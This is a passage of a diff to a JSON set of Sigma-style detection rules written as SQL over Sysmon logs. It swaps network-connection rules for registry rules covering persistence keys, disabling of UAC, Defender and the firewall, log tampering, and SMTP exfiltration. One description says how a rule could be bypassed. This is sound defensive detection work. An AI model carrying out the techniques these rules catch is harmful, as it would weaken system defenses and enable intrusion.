"registry_set_persistence_lsa_extension.yml" }, { - "title": "Wuauclt Network Connection", - "id": "c649a6c7-cd8c-4a78-9c04-000fc76df954", - "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Change the Fax Dll", + "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "status": "experimental", + "description": "Detect possible persistence using Fax DLL load when service restart", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ - "Legitimate use of wuauclt.exe over the network." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%wuauclt%' ESCAPE '\\' AND NOT (((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\UpdateDeploy.dll /ClassId %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE 
'%\\\\ImageName%' ESCAPE '\\') AND NOT (Details LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" ], - "filename": "net_connection_win_wuauclt_network_connection.yml" + "filename": "registry_set_fax_dll_persistance.yml" }, { - "title": "Remote PowerShell Session (Network)", - "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "status": "test", - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Potential Persistence Via MyComputer Registry Keys", + "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", + "status": "experimental", + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of remote PowerShell, e.g. 
remote administration and monitoring.", - "Network Service user name of a not-covered localization" + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" ], - "filename": "net_connection_win_remote_powershell_session_network.yml" + "filename": "registry_set_persistence_mycomputer.yml" }, { - "title": "HH.EXE Network Connections", - "id": "468a8cea-2920-4909-a593-0cbe1d96674a", + "title": "Disabled Windows Defender Eventlog", + "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", "status": "experimental", - "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", + "author": "Florian Roth (Nextron Systems)", "tags": 
[ "attack.defense_evasion", - "attack.t1218.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\hh.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_hh.yml" + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" }, { - "title": "Suspicious Outbound SMTP Connections", - "id": "9976fa64-2804-423c-8a5b-646ade840773", - "status": "experimental", - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "author": "frack113", + "title": "Windows Defender Exclusions Added - Registry", + "id": "a982fc9c-6333-4ffb-a51d-addb04e8b529", + "status": "test", + "description": "Detects the Setting of Windows Defender Exclusions", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Other SMTP tools" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('25', '587', '465', '2525') AND Initiated = 'true') AND NOT (((Image LIKE 
'%\\\\thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND Image LIKE '%\\\\HxTsr.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_outbound_smtp_connections.yml" + "filename": "registry_set_defender_exclusions.yml" }, { - "title": "Download a File with IMEWDBLD.exe", - "id": "8d7e392e-9b28-49e1-831d-5949c6281228", - "status": "test", - "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", + "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "status": "experimental", + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. 
The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", "author": "frack113", "tags": [ "attack.command_and_control", "attack.t1105" ], - "falsepositives": [ - "Legitimate script" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" - ], - "filename": "net_connection_win_imewdbld.yml" - }, - { - "title": "Cmstp Making Network Connection", - "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", - "status": "experimental", - "description": "Detects suspicious network connection by Cmstp", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1218.003" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_cmstp.yml" + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" }, { - "title": "Msiexec Initiated Connection", - "id": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", - "status": "test", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "title": "Potential Registry Persistence Attempt Via DbgManagedDebugger", + "id": "9827ae57-3802-418f-994b-d5ecf5cd974b", + "status": "experimental", + "description": "Detects the addition of the 
\"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. Which will get invoked when an application crashes", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.persistence", + "attack.t1574" ], "falsepositives": [ - "Legitimate msiexec over networks" + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\.NETFramework\\\\DbgManagedDebugger' ESCAPE '\\') AND NOT (Details LIKE '\"C:\\\\Windows\\\\system32\\\\vsjitdebugger.exe\" PID \\%d APPDOM \\%d EXTEXT \"\\%s\" EVTHDL \\%d' ESCAPE '\\'))" ], - "filename": "net_connection_win_msiexec.yml" + "filename": "registry_set_dbgmanageddebugger_persistence.yml" }, { - "title": "Suspicious Dropbox API Usage", - "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "title": "Potential Persistence Via App Paths Default Property", + "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", "status": "experimental", - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.012" + ], "falsepositives": [ - "Legitimate use of the API with a tool that the author wasn't aware of" + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%iex%' ESCAPE '\\' OR Details LIKE '%Invoke-%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%regsvr32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE 
'%.hta%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.ps1%' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_dropbox_api.yml" + "filename": "registry_set_persistence_app_paths.yml" }, { - "title": "RDP to HTTP or HTTPS Target Ports", - "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "title": "Potential AutoLogger Sessions Tampering", + "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" ], - "filename": "net_connection_win_rdp_to_http.yml" + "filename": "registry_set_disable_autologger_sessions.yml" }, { - "title": "Microsoft Binary Github Communication", - "id": 
"635dbb88-67b3-4b41-9ea5-a3af2dd88153", + "title": "Registry Persistence via Explorer Run Key", + "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", "status": "test", - "description": "Detects an executable in the Windows folder accessing github.com", - "author": "Michael Haag (idea), Florian Roth (Nextron Systems)", + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown", - "@subTee in your network" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (DestinationHostname LIKE '%.github.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((Details LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR Details LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" ], - "filename": "net_connection_win_binary_github_com.yml" + "filename": "registry_set_susp_reg_persist_explorer_run.yml" }, { - "title": "Microsoft Sync Center Suspicious Network Connections", - "id": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", + "title": "Disable UAC Using Registry", + "id": 
"48437c39-9e5f-47fb-af95-3d663c3f2919", "status": "experimental", - "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", - "author": "elhoim", + "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", + "author": "frack113", "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\') AND DestinationIsIpv6 = 'false'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": 
"net_connection_win_susp_outbound_mobsync_connection.yml" + "filename": "registry_set_disable_uac_registry.yml" }, { - "title": "Python Initiated Connection", - "id": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", + "title": "Office Security Settings Changed", + "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "status": "experimental", - "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate python script" + "Valid Macros and/or internal documents" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND Image LIKE '%python%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda-script.py%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\jupyter-notebook-script.py%' ESCAPE '\\') OR (DestinationIp = '127.0.0.1' AND SourceIp = '127.0.0.1')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" ], - "filename": 
"net_connection_win_python.yml" + "filename": "registry_set_office_security.yml" }, { - "title": "Silenttrinity Stager Msbuild Activity", - "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "title": "Disable Microsoft Defender Firewall via Registry", + "id": "974515da-6cc5-4c95-ae65-f97f9150ec7f", "status": "test", - "description": "Detects a possible remote connections to Silenttrinity c2", - "author": "Kiran kumar s, oscd.community", + "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1127.001" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" - ], - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" - }, - { - "title": "Windows Crypto Mining Pool Connections", - "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "status": "stable", - "description": "Detects process connections to a Monero crypto mining pool", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.impact", - "attack.t1496" - ], - "falsepositives": [ - "Legitimate use of crypto miners" - ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 
'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\EnableFirewall' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_crypto_mining.yml" + "filename": "registry_set_disable_defender_firewall.yml" }, { - "title": "Rundll32 Internet Connection", - "id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", + "title": "Registry Explorer Policy Modification", + "id": "1c3121ed-041b-4d97-a075-07f54f20fb4a", "status": "test", - "description": "Detects a rundll32 that communicates with public IP addresses", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.011", - "attack.execution" + "attack.t1112" ], "falsepositives": [ - "Communication to other corporate systems that use IP addresses from public address spaces" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR 
DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\') OR CommandLine LIKE '%PcaSvc.dll,PcaPatchSdbTask%' ESCAPE '\\' OR SourceHostname LIKE '%.internal.cloudapp.net' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND DestinationPort = '443')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoLogOff' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoDesktop' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFind' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFileMenu' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoClose' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoSetTaskbar' ESCAPE '\\' OR TargetObject LIKE 
'%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoPropertiesMyDocuments' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoTrayContextMenu' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_rundll32_net_connections.yml" + "filename": "registry_set_set_nopolicies_user.yml" }, { - "title": "Suspicious Epmap Connection", - "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "title": "Set TimeProviders DllName", + "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", "status": "experimental", - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "author": "frack113, Tim Shelton (fps)", + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "author": "frack113", "tags": [ - "attack.lateral_movement" + "attack.persistence", + 